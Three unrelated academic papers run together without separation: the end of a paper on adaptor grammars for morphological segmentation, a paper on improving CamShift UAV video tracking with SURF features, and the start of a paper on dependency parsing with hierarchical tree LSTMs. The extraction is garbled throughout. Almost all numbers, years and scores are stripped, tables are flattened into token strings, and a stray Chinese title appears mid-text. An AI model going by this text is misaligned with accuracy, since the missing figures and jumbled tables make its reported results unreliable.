three times more frequently than the unary rule. also, most of the more frequently used grammar rules expand the first branch (rooted in m ) into more finegrained structures. the second branch (m ) is mostly modelled with the unary rule. among the frequently cached rules we see the common english prefixes and suffixes. one of the most frequent cached rule stores the single letter e at the end of a word, which often causes oversegmen- tation of words ending in e (as seen in the incorrect examples in table ). 
this problem is common in unsupervised morphological segmentation of english (goldwater et al., ; goldsmith, ). we also took a look at the most frequent cached rules learned by the semi-supervised ag with the submorphs grammar, and observed that morphs correct segmentations incorrect segmentations word segmentation induced correct treatable [tr.ea.t]m [a.b.le]m disagree s dis agree s disciplined [dis.cip.l.i.n]m [e.d]m reduc e reduce monogamous [mon.o.g.a.m]m [o.u.s]m revalu e re value streakers [st.r.e.a.k]m [e.r]m [s]m derid e deride tollgate [t.o.l.l.]m [g.a.t.e]m [s]m accompani ed ac compani ed foxhunting [f.o.x]m [h.u.n.t]m [ing]m war y wary muscovites [m.u.sc.o.v]m [i.t.e]m [s]m indescrib able in describ able standardizes [st.a.n.d.a.rd]m [i.z.e]m [s]m orat es orate s slavers’ [sl.a.v]m [e.r]m [s]m [’]m alger ian s algeri an s earthiness’ [e.ar.th]m [i]m [ness]m [’]m disput e s dispute s instinkt [in.st.in.kt]m meister likkust meisterlikkus t rebis [re.b.i]m [s]m min a mina toitsid [to.it]m [s.id]m teiste teis te armuavaldus [a.rm.u]m [ava.ld.u.s]m kuritegu de sse kuri tegu desse määgivale [mää.g.i]m [v.a]m [l.e]m liharoa ga liha roa ga keskuskoulussa [kesk.us]m [koul.u]m [s.sa]m polte tti in polte tt i in peruslähteille [per.u.s]m [l.ä.ht.e]m [i]m [ll.e]m kulttuuri se lt a kin kulttuurise lta kin perunakaupoista [per.u.n.a]m [k.au.p.o]m [i]m [st.a]m tuote palki ntoja tuote palkinto j a yöpaikkaani [yö]m [p.ai.kk.a]m [a]m [n.i]m veli puo lt a veli puol ta nimettäköön [ni.m.e]m [tt.ä]m [k.ö]m [ö.n]m ota ttava otatta va table : examples of segmented words in english (top), estonian (middle) and finnish (bottom). correctly segmented words are in the left part of the table. the identified segments are in brackets indexed by the respective template nonterminal; dots separate the metagrammar generated parse tree leaves. examples of incorrectly segmented words together with the correct segmentation are on the right. freq (%) rule freq (%) cached rule . word → m m . (m (m (m (m s))))) . m → m m . (m (m (m (m e)) (m (m d)))) . word → m . (m (m (m (m i)) (m (m n g)))) . m → m . (m (m (m (m e))) . m → m . (m (m (m (m ’))) (m (m (m s)))) . m → m m . (m a) . m → m m . (m (m (m (m y)))) . m → m . (m (m (m (m e))) (m (m r))) . m → m m . (m (m (m (m a)))) table : examples from english most frequently used metagrammar rules and cached rules together with their relative occurrence frequencies (in percentages). tended to contain only a single submorph. this helps to explain why the submorphs grammar in semi-supervised ag improved less over the unsuper- vised ag as compared to the morphseq grammar— the rules with only a single submorph under the morph are essentially the same as they would be in the morphseq grammar. finally, we examined the consistency of the tem- plates chosen for each of the samplers during model selection for the test set (section . ). we found that there was some variability in the templates, but in most experiments the same template was chosen for the majority of the samplers (see table ). while this majority template is not always the optimal one on the dev set, we observed that it does produce con- sistently good results. it is possible that using the majority template, rather than the optimal template for the dev set, would actually produce better results majority template english m m m m m finnish m m m m m turkish m m m m m german m m m m m m estonian m m m table : majority templates for each language. 
note that the estonian gold standard contains less fine-grained segmentations than some of the other languages. on the test set, especially if (as appears to be the case here, and may often be the case in real applications) the dev and test sets are from somewhat different distributions. it must be noted that both ag select and semi- supervised ag are computationally more demanding than the comparison systems. since we do inference over tree structures, the complexity is cubic in the input word length, while most segmentation systems are quadratic or linear. even compared to the unsu- pervised ag, ag select is more expensive, because of the larger grammar and number of cached symbols. nevertheless, our systems can feasibly be run on the large morpho challenge datasets. other recent unsupervised systems have reported state-of-the art results by incorporating additional in- formation from surrounding words (lee et al., ), multilingual alignments (snyder and barzilay, ), or overlapping context features in a log-linear model (poon et al., ), but they have only been run on semitic languages and english (and in the latter case, a very small corpus). since they explicitly enumerate and sample from all possible segmentations of each word (often with some heuristic constraints), they could have trouble with the much longer words of the agglutinative languages tested here. in any case the results are not directly comparable to ours. conclusion in this paper we have introduced three new meth- ods for adaptor grammars and demonstrated their usefulness for minimally supervised morphological segmentation. first, we showed that ag models can be scaled to large data sets by using the posterior grammar for defining an inductive model, that on average results in the same accuracy as compared to full transductive training. second, we implemented semi-supervised ag in- ference, which uses labelled data to constrain the sampler, and showed that in all cases it performs much better than the unsupervised ag on the same grammar. semi-supervised ag could benefit from labelled data reweighting techniques frequently used in semi-supervised learning, and studying the proper ways of doing so within the ag framework would be a potential topic for future research. our final contribution is the ag select method, where the initial model is trained using a very general grammar that oversegments the data, and the labelled data is used to select which granularity of segments to use. unlike other morphological segmentation mod- els, this method can adapt its grammar to languages with different structures, rather than having to use the same grammar for every language. indeed, we found that ag select performs well across a range of languages and also seems to be less sensitive to differences between data sets (here, dev vs. test). in addition, it can be trained on either morphological analyses or segmentations. although we tuned all results to optimize the sbf metric, in principle the same method could be used to optimize other mea- sures, including extrinsic measures on downstream applications such as machine translation or informa- tion retrieval. in future we hope to show that this method can be used to improve performance on such applications, and also to explore its use for related segmentation tasks such as stemming or syllabifica- tion. 
also, the method itself could potentially be improved by designing a classifier to determinine the best template for each word based on a set of features, rather than using a single template for all words in the language. acknowledgments this work was supported by the tiger university pro- gram of estonian information technology founda- tion for the first author. we thank constantine lignos for releasing his morsel code to us, sami virpioja for evaluating test set results, and federico sangati for providing useful scripts. references mathias creutz and krista lagus. . unsupervised models for morpheme segmentation and morphology learning. acm transactions of speech and language processing, ( ): – , february. micha elsner, eugene charniak, and mark johnson. . structured generative models for unsupervised named- entity clustering. in proceedings of naacl, pages – . association for computational linguistics. john goldsmith. . unsupervised learning of the morphology of a natural language. computational lin- guistics, ( ): – , june. sharon goldwater, thomas l. griffiths, and mark john- son. . interpolating between types and tokens by estimating power-law generators. in advances in neu- ral information processing systems , pages – , cambridge, ma. mit press. eric a. hardisty, jordan boyd-graber, and philip resnik. . modeling perspective using adaptor grammars. in proceedings of emnlp, pages – . association for computational linguistics. zellig harris. . structural linguistics. university of chicago press. yun huang, min zhang, and chew lim tan. . non- parametric bayesian machine transliteration with syn- chronous adaptor grammars. in proceedings of acl: short papers - volume , pages – . association for computational linguistics. mark johnson and katherine demuth. . unsuper- vised phonemic chinese word segmentation using adap- tor grammars. in proceedings of coling, pages – . association for computational linguistics. mark johnson and sharon goldwater. . improving nonparameteric bayesian inference: experiments on un- supervised word segmentation with adaptor grammars. in proceedings of naacl, pages – . association for computational linguistics. mark johnson, thomas l. griffiths, and sharon gold- water. . adaptor grammars: a framework for specifying compositional nonparametric bayesian mod- els. in b. schölkopf, j. platt, and t. hoffman, editors, advances in neural information processing systems , pages – . mit press, cambridge, ma. mark johnson. a. unsupervised word segmentation for sesotho using adaptor grammars. in proceedings of acl special interest group on computational mor- phology and phonology, pages – . association for computational linguistics. mark johnson. b. using adaptor grammars to iden- tify synergies in the unsupervised acquisition of linguis- tic structure. in proceedings of acl, pages – . association for computational linguistics. oskar kohonen, sami virpioja, and krista lagus. a. semi-supervised learning of concatenative morphology. in proceedings of acl special interest group on com- putational morphology and phonology, pages – . association for computational linguistics. oskar kohonen, sami virpioja, laura leppänen, and krista lagus. b. semi-supervised extensions to morfessor baseline. in proceedings of the morpho challenge workshop, pages – . aalto univer- sity school of science and technology. yoong keok lee, aria haghighi, and regina barzilay. . modeling syntactic context improves morpho- logical segmentation. in proceedings of conll, pages – . 
association for computational linguistics. percy liang, hal daumé, iii, and dan klein. . struc- ture compilation: trading structure for features. in proceedings of icml, pages – . association for computing machinery. constantine lignos. . learning from unseen data. in mikko kurimo, sami virpioja, and ville t. turunen, editors, proceedings of the morpho challenge workshop, pages – . aalto university school of science and technology. jim pitman and marc yor. . the two-parameter poisson-dirichlet distribution derived from a stable sub- ordinator. annals of probability, ( ): – . hoifung poon, colin cherry, and kristina toutanova. . unsupervised morphological segmentation with log-linear models. in proceedings of naacl, pages – . association for computational linguistics. benjamin snyder and regina barzilay. . unsuper- vised multilingual learning for morphological segmen- tation. in proceedings of acl, pages – . associ- ation for computational linguistics. sebastian spiegler and christian monson. . emma: a novel evaluation metric for morphological analysis. in proceedings of coling, pages – . associ- ation for computational linguistics. sze-meng jojo wong, mark dras, and mark johnson. . exploring adaptor grammars for native language identification. in proceedings of emnlp, pages – . association for computational linguistics. 基于camshift的视频跟踪算法改进及实现 international journal of advanced network, monitoring and controls volume , no. , improvement and realization of camshift algorithm based motionimage tracking wang yubian* department of railway transportation control belarusian state university of transport, , kirova street, gomel, , republic of belarus *is the communication author. e-mail: alika_wang@mail.ru yuri shebzukhov department of the international relations belarusian state university of transport, republic of belarus , kirova street, gomel, , republic of belarus e-mail: oms@bsut.by abstract—the detection and tracking technology of moving object image is one of the key technologies of computer vision, and is widely used in many fields such as industry, transportation, and military. the detection and tracing of moving object in the motion scenes based on the uav platform is a technical difficulty in this field. in practical applications, the characteristics of complicated environment, small target object and moving platform require higher real-time performance and reliability of the algorithm. if it is possible to add some other features of the target to the tracking process, it will be possible to improve the shortcomings of camshift itself. based on the camshift tracking algorithm, this paper integrates surf feature detection into the algorithm, which greatly improves the tracking accuracy of the target object, and also has better real-time performance which can achieve better tracking performance of the object. keywords-motion image; camshift algorithm; surf; feature detection i. introduction video tracking is the key technology for motion target object detection in dynamic sceneson uav platform. it can be realized by two methods: one is based on target recognition technology, of which the core concept is frame-by-frame recognition algorithm for motion video to identify the target object and determine the target matching. 
the other is based on the detection technology of the moving object, of which the core concept is the active detection of the moving object, and the position of the moving object is determined in accordance with the detection result to realize the tracking.this method can achieve the tracking of any moving object without the need of complicated priori information for detection, such ascharacteristics of object shape, object sizes. however, the tracking effect of various tracking algorithms also depends on the background migration of the object, the unpredictable tracking path, the unpredictable target motion path and mode, the scene switch, the target object movement does not have an analyzable pattern, the change of camera model, the camera shift, and the change of illumination condition. and the causes of the changes in the color and shape of the moving object are very different [ ]. the current mainstream motion object tracking methods with good tracking performance mainly include feature-based tracking methods, region-based tracking methods, model-based tracking methods, motion estimation-based tracking methods, and contour-based tracking methods. the detection and tracking algorithm of the conventional motion object is only suitable for the scene with static or almost static background, but it is not suitable for the detection and tracking of moving objects in the uav video. therefore, the digital sequence information of the video images acquired by the drone should meet the real-time, accurate, robust and other requirements [ ]. the current research shows that the target object tracking method based on camshift algorithm can meet the requirements of drone video target tracking. the camshift algorithm performs target object recognition and tracking by analyzing the hue component doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , information of the target region in the hsv color space. the target has low deformation sensitivity. the algorithm has good real-time performance, little computationand low complexity. therefore it has been extensively studied. in the video target tracking by drone, the camshift algorithm [ ],comparing to other tracking methods, has many advantages and disadvantages. under the condition such as the similar color setting to the target object in the background or in the complicated scene, the camshift algorithm may have tracking error or fail to track because of the tracking characteristicsthat the algorithm is based on the color information of the moving object. if other auxiliary features of the object can be obtained during the search process and input conditionsof algorithm are specified, it is possible to make up for the problems caused by camshift in such scenes. because the surf algorithm has the advantage of good object recognition, the implementation of the speedup robust features (surf) in the camshift algorithm will greatly improve the tracking accuracy and the tracking reliability of the object. the improved method ensures the good real-time performance of the tracking, greatly improves the tracking accuracy of the object by uav, and eventually achieves a better tracking effect of the moving object. ii. the characteristics of surf the tracking of the characteristics of the target object isbased on the tracking of point of interest, which is often used in engineering applications and it works well. the difficulty of this method lies in the selection and extraction of features [ ]. 
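The hue-based tracking loop sketched below shows the CamShift baseline that the paper proposes to reinforce with SURF features: a hue histogram of the target region is back-projected onto each new frame and the search window follows the resulting probability mode. It uses OpenCV's standard CamShift API; the video path, the initial window, and the masking thresholds are placeholders, not settings from the paper.

import cv2
import numpy as np

cap = cv2.VideoCapture("uav_clip.mp4")            # placeholder input video
ok, frame = cap.read()
track_window = (300, 200, 80, 60)                 # placeholder x, y, w, h of the target

# Hue histogram of the target region in HSV space (dim/unsaturated pixels masked out).
x, y, w, h = track_window
hsv_roi = cv2.cvtColor(frame[y:y + h, x:x + w], cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv_roi, (0, 60, 32), (180, 255, 255))
roi_hist = cv2.calcHist([hsv_roi], [0], mask, [180], [0, 180])
cv2.normalize(roi_hist, roi_hist, 0, 255, cv2.NORM_MINMAX)

# Stop the mean-shift iterations after 10 steps or a sub-pixel move.
term_crit = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1)

while True:
    ok, frame = cap.read()
    if not ok:
        break
    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    back_proj = cv2.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)
    # CamShift adapts the window size and orientation while following the hue mode.
    rot_box, track_window = cv2.CamShift(back_proj, track_window, term_crit)
    cv2.polylines(frame, [np.int32(cv2.boxPoints(rot_box))], True, (0, 255, 0), 2)
    cv2.imshow("CamShift", frame)
    if cv2.waitKey(30) & 0xFF == 27:              # Esc quits
        break

cap.release()
cv2.destroyAllWindows()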
the selected features should fully cover the key characteristics of the target object in different scene settings, and they should also be convenient to extract. in general, if the number of sampling points is insufficient when extracting features, the object is easily lost and the tracking effect deteriorates. on the contrary, with too many points the amount and complexity of the computation increase greatly and cannot satisfy the actual application. although the harris corner detector is a traditional point-of-interest detection method, its fixed scale makes it difficult to determine the change in position of the target object between image frames when the target is deformed or changes in size.

prof. david g. lowe of the university of british columbia in canada first proposed the scale-invariant feature transform (sift) [ ]. the sift algorithm finds feature key points by performing feature detection within a constructed scale space. the orientation of each point of interest is calculated from the gradients of its neighborhood, so that the feature remains invariant to orientation within its scale. however, the algorithm has high computational complexity, places high requirements on hardware devices, and has poor real-time performance. on this basis, yan ke et al. introduced principal components analysis (pca) into the sift framework and proposed the pca-sift algorithm, which considerably improved the matching efficiency of the ordinary sift algorithm. however, this method can cause feature extraction to fail at a later stage and reduces the distinctiveness of the features. subsequently, a point-of-interest algorithm based on surf was proposed [ ]. the extracted features are used as the key local features of the images. the computation is accelerated by the integral-image method. the points of interest obtained via the haar wavelet transform are then used to obtain the main orientation and the feature vector [ ]. finally, the euclidean distance is calculated to verify the matching between images. the surf feature is invariant to changes in brightness, translation, rotation, and scale. in addition, the method's robustness is not harmed by noise interference, even when the viewing angle changes. this method not only achieves accurate feature recognition, but also reduces computational complexity, which greatly improves efficiency in use, and it has broad application.

iii. the surf algorithm
a. constructing the hessian matrix
surf relies on an approximation of the determinant of the hessian matrix of the image. the hessian matrix is the core of the surf algorithm [ ]. first, the hessian matrix of each pixel is calculated, and then the hessian determinant is used to decide whether the point is an extremum. gaussian filtering is used to construct the gaussian pyramid [ ]. compared with the gaussian-pyramid construction of the sift algorithm, the surf algorithm is faster. in the sift algorithm, the image size of each octave is different: the previous octave of images is downsampled by one half to obtain the next scale.
at the same time, the images within one octave have the same size; the difference is that different scales σ are used. moreover, during blurring the size of the gaussian template is kept constant and only the scale σ changes. for the surf algorithm, the image size always remains the same; only the size of the box-filter template and the scale σ need to be changed.

b. preliminary determination of points of interest using non-maximum suppression
each pixel processed by the hessian matrix is compared with the points in its three-dimensional neighborhood. if it is the extremum of these points, it is selected as a preliminary point of interest for the next stage [ ]. the detection process uses a filter whose size corresponds to the scale of the image; in this paper one filter size is used as an example for the detection analysis. the candidate point is compared with the remaining pixels in its own scale layer and with the pixels in the adjacent scale layers above and below it, which completes the comparison over the three-dimensional neighborhood.

c. precisely locating the extremum
three-dimensional linear interpolation yields sub-pixel points of interest, while points whose values are below a certain threshold are removed. raising the threshold reduces the number of detected points of interest, so that finally only a few strongly distinctive points are retained and the amount of work is reduced [ ].

d. selecting the main orientation of the point of interest
to ensure rotational invariance, surf does not compute a gradient histogram; instead, the haar wavelet responses around the point of interest are computed [ ]. that is, centered on the point of interest, within a circular neighborhood whose radius is proportional to the scale s of the point of interest, the haar wavelet responses of all points in the x- and y-directions are computed inside a fan-shaped sliding window, with the wavelet side length also proportional to s. a gaussian weight coefficient is assigned to the haar wavelet responses so that responses close to the point of interest contribute more and responses far from it contribute less. the responses within the window are then summed to yield a new vector, and the whole circular region is traversed. the orientation of the longest vector is taken as the main orientation of the point of interest [ ].

e. constructing the descriptor of the surf point of interest [ ]
a square region is extracted around the point of interest, with the window size proportional to s and the region oriented along the main orientation detected in the previous step. the region is then divided into sub-regions, and in each sub-region the haar wavelet responses of the pixels in the x- and y-directions are summed, where x and y are taken relative to the main orientation. the descriptor of each sub-region consists of the sum of the responses in the horizontal direction, the sum of their absolute values, the sum of the responses in the vertical direction, and the sum of their absolute values.

iv. extracting and matching the points of interest
(1) select a frame from the drone tracking video and extract the points of interest using the surf detection method, as shown in the figure (figure: extracted points of interest). an illustrative code sketch of this step, and of the matching step that follows, is given below.
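for illustration only, the following is a minimal sketch of how the extraction and matching steps could be carried out with opencv's surf implementation; it is not the code used by the authors, the frame file names are hypothetical, and it assumes an opencv-contrib build that still ships the nonfree surf module.

```python
# a minimal sketch of steps (1) and (2) using opencv's surf implementation.
# assumptions: opencv-contrib-python built with the nonfree module is installed,
# and "frame1.png"/"frame2.png" are two adjacent frames grabbed from the uav video
# (both file names are hypothetical placeholders).
import cv2

frame1 = cv2.imread("frame1.png", cv2.IMREAD_GRAYSCALE)
frame2 = cv2.imread("frame2.png", cv2.IMREAD_GRAYSCALE)

# the hessian threshold controls how strong a blob response must be to become a keypoint
surf = cv2.xfeatures2d.SURF_create(hessianThreshold=400)

kp1, des1 = surf.detectAndCompute(frame1, None)   # step (1): extract points of interest
kp2, des2 = surf.detectAndCompute(frame2, None)

# step (2): match descriptors between the two frames with a ratio test
matcher = cv2.BFMatcher(cv2.NORM_L2)
knn_matches = matcher.knnMatch(des1, des2, k=2)
good = [m for m, n in knn_matches if m.distance < 0.7 * n.distance]

vis = cv2.drawMatches(frame1, kp1, frame2, kp2, good, None)
cv2.imwrite("matches.png", vis)
```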
(2) match the target region. after selecting the target region, extract the target regions in the two adjacent frames and match their points of interest. the figure (figure: matched points of interest) shows that the points of interest are matched successfully.

v. verification
after the target window is selected manually, a feedback mechanism is used to compute the color similarity between the camshift tracking window and the initial window, and the feature similarity between the surf tracking window and the initial window. large displacements are suppressed, and the displacement weight is assigned dynamically to the two tracking algorithms according to the bhattacharyya distance [ ]. the camshift tracking algorithm is preferred when tracking is stable; otherwise the surf tracking method [ ] is preferred. the experiments show that this tracking method performs well and can overcome the tracking interference caused by background changes and object similarity. a picture of the tracked object is taken every few seconds; examples are shown in the figures (figures: tracking images at successive times). as these figures show, the drone achieves good results in tracking the moving object.

vi. conclusion
starting from the classic camshift tracking algorithm and focusing on its deficiencies for tracking moving objects in drone video, this paper proposes combining the camshift algorithm with surf feature detection to track moving objects in uav video. the experimental results show that the proposed method can effectively track and locate the target object against a relatively complex aerial-photography background. the experiment achieved good results: tracking of the moving object is basically realized, the tracking speed is fast, the real-time performance is satisfactory, and the time consumption is small. however, in practical applications the environment of object tracking is more complicated and diverse, so further study can proceed in the following directions. this paper only studied the tracking of a single object and did not address the tracking of multiple similar objects; multi-object tracking has practical significance in video surveillance, intelligent traffic detection, air formations, and geographic monitoring, so it deserves further study. the object-tracking system in this paper also needs improvement, including optimization of the logic and the addition of parallel processing to improve tracking efficiency. finally, the camshift algorithm used here is still based on a color histogram, which is sensitive to changes in illumination and in the color of objects; when the camera resolution is low and the ambient light is insufficient, the tracking effect is poor, so further study should focus on tracking physical features that are insensitive to illumination.

references
[ ] liu yanli, tang xianqi, chen yuedong. application research of moving target tracking algorithm based on improved camshift [j]. journal of anhui polytechnic university.
[ ] xiong tan, xuchu yu, jingzheng liu, weijie huang. object fast tracking based on unmanned aerial vehicle video [c]. proceedings of paciia, ieee press.
[ ] c. harris, m. j.
stephens. a combined corner and edge detector [c]. proceedings of the alvey vision conference.
[ ] d. g. lowe. distinctive image features from scale-invariant keypoints [j]. international journal of computer vision.
[ ] liu yawei. review of target detection and tracking methods in uav aerial photography video [j]. airborne missile.
[ ] yan k., sukthankar r. pca-sift: a more distinctive representation for local image descriptors [c]. proceedings of cvpr, los alamitos: ieee press.
[ ] bay h., ess a., tuytelaars t. speeded up robust features (surf) [j]. computer vision and image understanding.
[ ] leutenegger s., chli m., siegwart r. brisk: binary robust invariant scalable keypoints [c]. proceedings of iccv, ieee press.
[ ] cui zhe. image feature point extraction and matching based on sift algorithm [d]. xi'an: xidian university.
[ ] yu huai, yang wen. a fast feature extraction and matching algorithm for uav aerial images [j]. journal of electronics and information technology.
[ ] wang jianxiong. research on key technologies of low altitude photogrammetry of unmanned airship and practice of large scale map formation [d]. xi'an: chang'an university.
[ ] li yifei. research on pid control in four-rotor aircraft [j]. technology and market.
[ ] li xiang, wang yongjun, li zhi. misalignment error and correction of attitude system vector sensor [j]. journal of sensor technology.
[ ] wang donghua, yue dawei. design and implementation of large remote sensing image correction effect detection system [j]. computer programming skills and maintenance.

easy-first dependency parsing with hierarchical tree lstms
eliyahu kiperwasser, computer science department, bar-ilan university, ramat-gan, israel. elikip@gmail.com
yoav goldberg, computer science department, bar-ilan university, ramat-gan, israel. yoav.goldberg@gmail.com

abstract
we suggest a compositional vector representation of parse trees that relies on a recursive combination of recurrent-neural-network encoders.
to demonstrate its effectiveness, we use the representation as the backbone of a greedy, bottom-up dependency parser, achieving very strong accuracies for english and chinese, without relying on external word embeddings. the parser's implementation is available for download at the first author's webpage.

introduction
dependency-based syntactic representations of sentences are central to many language processing tasks (kübler et al., ). dependency parse-trees encode not only the syntactic structure of a sentence but also many aspects of its semantics. a recent trend in nlp is concerned with encoding sentences as vectors ("sentence embeddings"), which can then be used for further prediction tasks. recurrent neural networks (rnns) (elman, ), and in particular methods based on the lstm architecture (hochreiter and schmidhuber, ), work very well for modeling sequences, and constantly obtain state-of-the-art results on both language-modeling and prediction tasks (see, e.g., (mikolov et al., )).

several works attempt to extend recurrent neural networks to work on trees (see the related-work discussion below for a brief overview), giving rise to the so-called recursive neural networks (goller and kuchler, ; socher et al., ). however, recursive neural networks do not cope well with trees with arbitrary branching factors – most works require the encoded trees to be binary-branching, or to have a fixed maximum arity. other attempts allow arbitrary branching factors at the expense of ignoring the order of the modifiers.

in contrast, we propose a tree encoding that naturally supports trees with arbitrary branching factors, making it particularly appealing for dependency trees. our tree encoder uses recurrent neural networks as a building block: we model the left and right sequences of modifiers using rnns, which are composed in a recursive manner to form a tree. we use our tree representation for encoding the partially-built parse trees in a greedy, bottom-up dependency parser which is based on the easy-first transition system of goldberg and elhadad ( ).

using the hierarchical tree lstm representation, and without using any external embeddings, our parser achieves parsing accuracies of . uas and . las on the ptb (stanford dependencies) and . uas and . las on the chinese treebank, while relying on greedy decoding. to the best of our knowledge, this is the first work to demonstrate competitive parsing accuracies for full-scale parsing while relying solely on recursive, compositional tree representations, and without using a reranking framework. we discuss related work below.

while the parsing experiments demonstrate the suitability of our representation for capturing the structural elements in the parse tree that are useful for predicting parsing decisions, we are interested in exploring the use of the rnn-based compositional vector representation of parse trees also for semantic tasks such as sentiment analysis (socher et al., b; tai et al., ), sentence similarity judgements (marelli et al., ) and textual entailment (bowman et al., ).

background and notation
dependency-based representation
a dependency-based syntactic representation is centered around syntactic modification relations between head words and modifier words.
the result is a tree in which each node is a word in the sentence, and every node except for one designated root node has a parent node. a dependency tree over a sentence with n words w1, . . . , wn can be represented as a list of n pairs of the form (h, m), where 0 ≤ h ≤ n and 1 ≤ m ≤ n. each such pair represents an edge in the tree in which h is the index of a head word (including the special root node 0), and m is the index of a modifier word. in order for the dependency trees to be useful for actual downstream language processing tasks, each edge is labeled with a syntactic relation. the tree representation then becomes a list of triplets (h, m, ℓ), where 1 ≤ ℓ ≤ l is the index of a dependency relation out of a designated set of l syntactic relations.

dependency trees tend to be relatively shallow, with some nodes having many children. looking at trees in the ptb training set we find that % of the trees have a height of at most , and % of the trees a height of at most . in terms of width, % of the trees have at least one node with an arity of or more, and % of the trees have at least one node with an arity of or more.

recurrent networks and lstms
recurrent neural networks (rnns), first proposed by elman ( ), are statistical learners for modeling sequential data. in this work, we use the rnn abstraction as a building block, and recursively combine several rnns to obtain our tree representation. we briefly describe the rnn abstraction below; for further detail on rnns, the reader is referred to sources such as (goldberg, ; bengio and courville, ; cho, ).

the rnn abstraction is a function rnn that takes in a sequence of input vectors x1, . . . , xn (xi ∈ R^din) and produces a sequence of state vectors (also called output vectors) y1, . . . , yn (yi ∈ R^dout). each yi is conditioned on all the inputs x1, . . . , xi preceding it. ignoring the intermediate outputs y1, . . . , yn−1, the rnn can be thought of as encoding the sequence x1, . . . , xn into a final state yn. our notation in this paper follows this view. the rnn is defined recursively using two functions:

rnn(s0, x1, . . . , xn) = yn = o(sn)
si = n(si−1, xi)

here, a function n takes as input a vector xi and a state vector si−1 and returns as output a new state si. one can then extract an output vector yi from si using the function o (the function o is usually the identity function, or a function that returns a subset of the elements in si).

taking an algorithmic perspective, one can view the rnn as a state object with three operations: s = rnn.initial() returns a new initial state, s.advance(x) takes an input vector and returns a new state, and s.output() returns the output vector for the current state. when clear from the context, we abbreviate and use the state's name (s) instead of s.output() to refer to the output vector at the state. the functions n and o defining the rnn are parameterized by parameters θ (matrices and vectors), which are trained from data. specifically, one is usually interested in using some of the outputs yi for making predictions. the rnn is trained such that the encoding yi is good for the prediction task; that is, the rnn learns which aspects of the sequence x1, . . . , xi are informative for the prediction. we use subscripts (i.e., rnnl, rnnr) to indicate different rnns, that is, rnns that have different sets of parameters. specific instantiations of n and o yield different recurrent network mechanisms.
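as a concrete illustration of the state-object view described above, the following is a minimal sketch of the rnn abstraction; the class and function names are illustrative only and are not taken from the authors' implementation.

```python
# a minimal sketch of the rnn-as-state-object abstraction described above.
# any concrete rnn (e.g. an lstm) can supply the transition function N and
# the output function O; both are passed in by the caller.
class RNNState:
    def __init__(self, n_fn, o_fn, state):
        self.n_fn = n_fn      # N: (previous state, input vector) -> new state
        self.o_fn = o_fn      # O: state -> output vector
        self.state = state

    def advance(self, x):
        # consume one input vector and return the new state object
        return RNNState(self.n_fn, self.o_fn, self.n_fn(self.state, x))

    def output(self):
        return self.o_fn(self.state)

def encode_sequence(initial, xs):
    # encodes x1..xn into the final state's output, i.e. RNN(s0, x1, ..., xn)
    s = initial
    for x in xs:
        s = s.advance(x)
    return s.output()
```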
in this work we use the long short-term memory (lstm) variant (hochreiter and schmidhuber, ), which has been shown to be a very capable sequence learner. however, our algorithm and encoding method do not rely on any specific property of the lstm architecture, and the lstm can be transparently switched for any other rnn variant. (we follow the notation of goldberg ( ), with the exception of taking the output of the rnn to be a single vector rather than a sequence, and renaming r to n.)

tree representation
we now describe our method for representing a tree as a d-dimensional vector. we assume trees in which the children are ordered and there are kl ≥ 0 children before the parent node (left children) and kr ≥ 0 children after it (right children). such trees correspond well to dependency tree structures. we refer to the parent node as a head, and to its children as modifiers. for a node t, we refer to its left modifiers as t.l1, t.l2, . . . , t.lkl and to its right modifiers as t.r1, t.r2, . . . , t.rkr. the indices of the modifiers always run from the parent outward; that is, t.l1 is the left modifier closest to the head t. (diagram: a head node t with left modifiers t.l1, t.l2, . . . on one side and right modifiers t.r1, t.r2, . . . on the other.)

the gist of the idea is to treat the modifiers of a node as a sequence, and encode this sequence using an rnn. we separate left-modifiers from right-modifiers, and use two rnns: the first rnn encodes the sequence of left-modifiers from the head outwards, and the second rnn the sequence of right-modifiers from the head outwards. the first input to each rnn is the vector representation of the head word, and the last input is the vector representation of the left-most or the right-most modifier. the node's representation is then a concatenation of the rnn encoding of the left-modifiers with the rnn encoding of the right-modifiers. the encoding is recursive: the representation for each of the modifier nodes is computed in a similar fashion. (diagram: enc(t) is obtained by running rnnl over the head and its left modifiers, running rnnr over the head and its right modifiers, and then concatenating and compressing the two final states.)

more formally, consider a node t. let i(t) be the sentence index of the word corresponding to the head node t, and let vi be a vector corresponding to the ith word in the sentence (this vector captures information such as the word form and its part-of-speech tag, and will be discussed shortly). the vector encoding of a node enc(t) ∈ R^denc is then defined as follows:

enc(t) = g(we · (el(t) ◦ er(t)) + be)
el(t) = rnnl(vi(t), enc(t.l1), . . . , enc(t.lkl))
er(t) = rnnr(vi(t), enc(t.r1), . . . , enc(t.rkr))

first, the sequences consisting of the head-vector vi(t) followed by the left-modifiers, and of the head-vector followed by the right-modifiers, are encoded using two rnns, rnnl and rnnr, resulting in rnn states el(t) ∈ R^dout and er(t) ∈ R^dout. then, the rnn states are concatenated, resulting in a 2·dout-dimensional vector (el(t) ◦ er(t)), which is reduced back to d dimensions using a linear transformation followed by a non-linear activation function g. the recursion stops at leaf nodes, for which:

enc(leaf) = g(we · (el(leaf) ◦ er(leaf)) + be)
el(leaf) = rnnl(vi(leaf))
er(leaf) = rnnr(vi(leaf))

the figure shows the network used for encoding the sentence "the black fox who really likes apples did not jump over a lazy dog yesterday".
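a schematic sketch of the recursive encoder defined by the equations above is given next; the node fields, helper names and nonlinearity are illustrative assumptions, the rnn_l/rnn_r encoders are stand-ins supplied by the caller, and this is not the authors' released implementation.

```python
# a schematic sketch of the recursive tree encoder defined above.
# rnn_l and rnn_r stand for any sequence encoders returning their final state
# (e.g. lstms); W_e, b_e and the nonlinearity g are the compression parameters.
import numpy as np

def g(x):
    return np.tanh(x)

def encode(node, rnn_l, rnn_r, W_e, b_e):
    # each sequence starts with the head's word vector, followed by the
    # (recursively encoded) modifiers from the head outward; for a leaf the
    # modifier lists are empty, matching the leaf equations above.
    left_seq = [node.word_vec] + [encode(m, rnn_l, rnn_r, W_e, b_e) for m in node.left]
    right_seq = [node.word_vec] + [encode(m, rnn_l, rnn_r, W_e, b_e) for m in node.right]
    e_l = rnn_l(left_seq)     # final state of the left-modifier rnn
    e_r = rnn_r(right_seq)    # final state of the right-modifier rnn
    # concatenate the two states and compress back to d dimensions
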